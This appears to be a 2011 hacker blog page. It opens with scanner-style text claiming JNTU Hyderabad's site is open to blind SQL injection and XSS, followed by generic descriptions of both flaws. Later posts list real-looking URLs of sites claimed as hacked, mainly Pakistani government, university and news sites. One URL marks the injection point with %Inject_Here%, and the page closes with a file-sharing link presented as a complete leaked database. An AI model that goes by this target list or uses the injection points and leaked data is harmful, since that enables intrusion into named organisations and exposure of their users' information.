
JNTU Hyderabad Vulnerable to Blind SQL Injection and XSS


The best university in India

JNTUH has in total 415 affiliated colleges:

287 Engg & Tech. (250 existing + 37 new)

95 Pharmacy (90 existing + 05 new)

21 Standalone MCA and/or MBA (10 existing + 11 new)

12 Integrated Campuses (E-12, P-6, MBA-8, MCA-2)

But this website is vulnerable to blind SQL injection and cross-site scripting. This may compromise the integrity of your database and/or expose sensitive information.

Please patch all of these vulnerabilities as soon as possible.

Vulnerability description

This script is possibly vulnerable to SQL Injection attacks.

SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn’t properly filter out dangerous characters.

This is one of the most common application-layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, a large number of web applications remain vulnerable.

This vulnerability affects /xxxx.php.

Discovered by: Scripting (Blind_Sql_Injection.script).

The impact of this vulnerability

An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

 

 

Cross Site Scripting

Vulnerability description

This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.

Cross-site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know whether the script should be trusted, it executes the script in the user's context, allowing the attacker to access any cookies or session tokens retained by the browser.

The impact of this vulnerability

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

 

 

Posted by on June 21, 2011 in Vulnerable Websites

 

Hacked Pakistan (balochistanpolice) http://www.balochistanpolice.gov.pk/page.php?id=3



Posted by on June 21, 2011 in Hacked Websites

 

Hacked Agenceva (http://www.agencevu.com/stories/index.php?id=1021&p=238)



Posted by on June 21, 2011 in Hacked Websites

 

Hacked Pakistan hubbardbreeders (http://www.hubbardbreeders.com/news/index.php?id=66)



Posted by on June 21, 2011 in Hacked Websites

 

Hacked Pakistan HAZARA University (http://www.hu.edu.pk/contacts.php?id=%Inject_Here%2)



Posted by on June 21, 2011 in Hacked Websites

 

Hacked PAKISTAN Online News (http://www.onlinenews.com.pk/details.php?id=180339)



Posted by on June 21, 2011 in Hacked Websites

 

PAKBUGS Complete DataBase


https://www.box.net/shared/vpgzcxct80ya40dd38cr

 

 

Posted by on June 19, 2011 in Hacked Websites